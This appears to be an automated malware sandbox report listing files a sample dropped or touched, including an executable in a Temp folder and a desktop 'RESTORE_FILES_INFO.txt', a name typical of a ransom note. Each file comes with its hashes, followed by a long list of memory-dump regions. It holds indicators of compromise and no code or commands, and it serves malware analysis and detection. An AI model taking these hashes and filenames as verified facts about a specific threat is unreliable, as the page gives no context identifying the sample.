C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef82f227-b817-40a4-98c1-13819aa5bd6b
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f711fc6c-cabf-4e97-a825-6cc0ec704283
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fca1dc25-4d9a-41b9-9a41-ef2da30a1160
MD5
354b8209f647a42e2ce36d8cf326cc92

SHA1
98c3117f797df69935f8b09fc9e95accfe3d8346

SHA256
feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

SHA512
420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
ed79dccb96a5fb73d754bf1761df0caa

SHA1
86b7de77c2bb7343943632f0d100b8059519c94b

SHA256
a2606f99d84fdd00c0b732163ec7b6c36bbad93d2b3b6ad1a22c9e9255e14693

SHA512
094f1f50f0bf0ac5c7f50581a3af0cec39db45cea995258fba9be23ed66c3af4484bb9ea92241fe619e7fa1607e9a239266db7aa1a06a816806eafdd55224cd3

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
MD5
48ea3794091a9f17e12f5c1a90e1f7d7

SHA1
1bb17eef59764e84f95b7a5c0aad649b8517ee43

SHA256
dcd725c415cebc7df170edf49af18d6f86e76ef75185737de5959405f4aecc56

SHA512
0355be6a2b2cf58d4ca5b11de5f84803240587937cd28d064df20ac38c945352e14c78e21006824114f67ede71be3ab27cc27b05759fc23a1fb8dcfa31a7244f

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
MD5
48ea3794091a9f17e12f5c1a90e1f7d7

SHA1
1bb17eef59764e84f95b7a5c0aad649b8517ee43

SHA256
dcd725c415cebc7df170edf49af18d6f86e76ef75185737de5959405f4aecc56

SHA512
0355be6a2b2cf58d4ca5b11de5f84803240587937cd28d064df20ac38c945352e14c78e21006824114f67ede71be3ab27cc27b05759fc23a1fb8dcfa31a7244f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
f7781bafeaeced7f4989c3eedb54ab13

SHA1
7f7ad4e8cd1273c107802430a055375839625be0

SHA256
45f429c86eb997c79b2323cf163dc67434e0bd8dda55ae30a4cbb2179962f6f9

SHA512
bafe491e3f42504611fc0678c5bc232861923120494f56f9dac018922e8b826d5d58b1e565cd428607360d248aa651c8ef178f08afe00495eca46e740ad3dffe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
f7781bafeaeced7f4989c3eedb54ab13

SHA1
7f7ad4e8cd1273c107802430a055375839625be0

SHA256
45f429c86eb997c79b2323cf163dc67434e0bd8dda55ae30a4cbb2179962f6f9

SHA512
bafe491e3f42504611fc0678c5bc232861923120494f56f9dac018922e8b826d5d58b1e565cd428607360d248aa651c8ef178f08afe00495eca46e740ad3dffe

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
MD5
e7dcff92a61f00531c0c7b1a1e6cceec

SHA1
2e6e7ff3ada7ce63b6a1c9fe4d968d35b145fea2

SHA256
d6483ad4f4c12635f4377f469dfc97ba126bd192f8b9393aebd547358ba7b48c

SHA512
f938e8d0b9aeb38cd14b20b825e3fe1466ee180d367416934d819045c7aa76a4be5f98d3992136f8c2f0847512e798239ed243614c7bea08ecf4d19467fc2ff5

Download Submit
\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
MD5
48ea3794091a9f17e12f5c1a90e1f7d7

SHA1
1bb17eef59764e84f95b7a5c0aad649b8517ee43

SHA256
dcd725c415cebc7df170edf49af18d6f86e76ef75185737de5959405f4aecc56

SHA512
0355be6a2b2cf58d4ca5b11de5f84803240587937cd28d064df20ac38c945352e14c78e21006824114f67ede71be3ab27cc27b05759fc23a1fb8dcfa31a7244f

Download Submit
memory/272-63-0x0000000000000000-mapping.dmp

Download
memory/340-74-0x0000000000000000-mapping.dmp

Download
memory/364-73-0x0000000000000000-mapping.dmp

Download
memory/436-79-0x0000000000000000-mapping.dmp

Download
memory/548-85-0x0000000000000000-mapping.dmp

Download
memory/680-81-0x0000000000000000-mapping.dmp

Download
memory/808-87-0x0000000000000000-mapping.dmp

Download
memory/840-84-0x0000000000000000-mapping.dmp

Download
memory/928-72-0x0000000000000000-mapping.dmp

Download
memory/972-83-0x0000000000000000-mapping.dmp

Download
memory/992-62-0x0000000000000000-mapping.dmp

Download
memory/1020-64-0x0000000000000000-mapping.dmp

Download
memory/1028-76-0x0000000000000000-mapping.dmp

Download
memory/1088-68-0x0000000000000000-mapping.dmp

Download
memory/1100-80-0x0000000000000000-mapping.dmp

Download
memory/1104-61-0x0000000000000000-mapping.dmp

Download
memory/1164-69-0x0000000000000000-mapping.dmp

Download
memory/1176-65-0x0000000000000000-mapping.dmp

Download
memory/1216-58-0x0000000000000000-mapping.dmp

Download
memory/1224-70-0x0000000000000000-mapping.dmp

Download
memory/1240-59-0x0000000000610000-0x0000000000621000-memory.dmp

Filesize
68KB

Download
memory/1240-10-0x0000000004BA0000-0x0000000004BA1000-memory.dmp

Filesize
4KB

Download
memory/1240-55-0x0000000000610000-0x0000000000621000-memory.dmp

Filesize
68KB

Download
memory/1240-53-0x0000000000610000-0x0000000000621000-memory.dmp

Filesize
68KB

Download
memory/1240-4-0x0000000000000000-mapping.dmp

Download
memory/1240-7-0x0000000073B80000-0x000000007426E000-memory.dmp

Filesize
6.9MB

Download
memory/1240-8-0x0000000001330000-0x0000000001331000-memory.dmp

Filesize
4KB

Download
memory/1332-86-0x0000000000000000-mapping.dmp

Download
memory/1416-66-0x0000000000000000-mapping.dmp

Download
memory/1512-19-0x0000000004880000-0x0000000004881000-memory.dmp

Filesize
4KB

Download
memory/1512-15-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download
memory/1512-36-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1512-35-0x00000000062A0000-0x00000000062A1000-memory.dmp

Filesize
4KB

Download
memory/1512-37-0x00000000055F0000-0x00000000055F1000-memory.dmp

Filesize
4KB

Download
memory/1512-13-0x0000000073B80000-0x000000007426E000-memory.dmp

Filesize
6.9MB

Download
memory/1512-14-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/1512-27-0x0000000005750000-0x0000000005751000-memory.dmp

Filesize
4KB

Download
memory/1512-16-0x0000000004940000-0x0000000004941000-memory.dmp

Filesize
4KB

Download
memory/1512-52-0x0000000006330000-0x0000000006331000-memory.dmp

Filesize
4KB

Download
memory/1512-17-0x0000000004942000-0x0000000004943000-memory.dmp

Filesize
4KB

Download
memory/1512-51-0x0000000006320000-0x0000000006321000-memory.dmp

Filesize
4KB

Download
memory/1512-11-0x0000000000000000-mapping.dmp

Download
memory/1512-18-0x00000000011C0000-0x00000000011C1000-memory.dmp

Filesize
4KB

Download
memory/1512-22-0x0000000005630000-0x0000000005631000-memory.dmp

Filesize
4KB

Download
memory/1512-28-0x00000000061A0000-0x00000000061A1000-memory.dmp

Filesize
4KB

Download
memory/1644-56-0x0000000000000000-mapping.dmp

Download
memory/1668-2-0x0000000074B31000-0x0000000074B33000-memory.dmp

Filesize
8KB

Download
memory/1760-78-0x0000000000000000-mapping.dmp

Download
memory/1776-82-0x0000000000000000-mapping.dmp

Download
memory/1896-54-0x0000000000000000-mapping.dmp

Download
memory/1900-67-0x0000000000000000-mapping.dmp

Download
memory/1964-75-0x0000000000000000-mapping.dmp

Download
memory/1988-60-0x0000000000000000-mapping.dmp

Download
memory/2028-71-0x0000000000000000-mapping.dmp

Download
memory/2044-77-0x0000000000000000-mapping.dmp

Download
memory/2068-88-0x0000000000000000-mapping.dmp

Download
memory/2100-106-0x0000000000000000-mapping.dmp

Download
memory/2108-101-0x0000000000000000-mapping.dmp

Download
memory/2128-95-0x0000000000000000-mapping.dmp

Download
memory/2140-97-0x0000000000000000-mapping.dmp

Download
memory/2164-108-0x0000000000000000-mapping.dmp

Download
memory/2192-89-0x0000000000000000-mapping.dmp

Download
memory/2216-90-0x0000000000000000-mapping.dmp

Download
memory/2240-91-0x0000000000000000-mapping.dmp

Download
memory/2264-92-0x0000000000000000-mapping.dmp

Download
memory/2284-93-0x0000000000000000-mapping.dmp

Download
memory/2308-122-0x00000000048F2000-0x00000000048F3000-memory.dmp

Filesize
4KB

Download
memory/2308-123-0x0000000001350000-0x0000000001351000-memory.dmp

Filesize
4KB

Download
memory/2308-120-0x00000000048F0000-0x00000000048F1000-memory.dmp

Filesize
4KB

Download
memory/2308-118-0x0000000004930000-0x0000000004931000-memory.dmp

Filesize
4KB

Download
memory/2308-94-0x0000000000000000-mapping.dmp

Download
memory/2308-116-0x0000000001070000-0x0000000001071000-memory.dmp

Filesize
4KB

Download
memory/2308-127-0x00000000053A0000-0x00000000053A1000-memory.dmp

Filesize
4KB

Download
memory/2308-114-0x0000000073B80000-0x000000007426E000-memory.dmp

Filesize
6.9MB

Download
memory/2336-96-0x0000000000000000-mapping.dmp

Download
memory/2368-98-0x0000000000000000-mapping.dmp

Download
memory/2384-99-0x0000000000000000-mapping.dmp

Download
memory/2420-100-0x0000000000000000-mapping.dmp

Download
memory/2460-102-0x0000000000000000-mapping.dmp

Download
memory/2492-104-0x0000000000000000-mapping.dmp

Download
memory/2508-105-0x0000000000000000-mapping.dmp

Download
memory/2548-107-0x0000000000000000-mapping.dmp

Download
memory/2576-109-0x0000000000000000-mapping.dmp

Download
memory/2592-110-0x0000000000000000-mapping.dmp

Download
memory/2616-111-0x0000000000000000-mapping.dmp

Download
memory/2660-113-0x0000000000000000-mapping.dmp

Download
memory/2696-115-0x0000000000000000-mapping.dmp

Download
memory/2728-117-0x0000000000000000-mapping.dmp

Download
memory/2760-119-0x0000000000000000-mapping.dmp

Download
memory/2788-121-0x0000000000000000-mapping.dmp

Download
memory/2836-124-0x0000000000000000-mapping.dmp

Download
memory/2848-125-0x0000000000000000-mapping.dmp

Download
memory/2868-126-0x0000000000000000-mapping.dmp

Download
memory/5116-145-0x0000000073B80000-0x000000007426E000-memory.dmp

Filesize
6.9MB

Download
memory/5116-146-0x0000000000B50000-0x0000000000B51000-memory.dmp

Filesize
4KB

Download
memory/5116-147-0x0000000004A30000-0x0000000004A31000-memory.dmp

Filesize
4KB

Download
memory/5116-149-0x00000000049F2000-0x00000000049F3000-memory.dmp

Filesize
4KB

Download
memory/5116-148-0x00000000049F0000-0x00000000049F1000-memory.dmp

Filesize
4KB

Download
memory/5116-150-0x0000000001360000-0x0000000001361000-memory.dmp

Filesize
4KB

Download
memory/5116-151-0x0000000005300000-0x0000000005301000-memory.dmp

Filesize
4KB

Download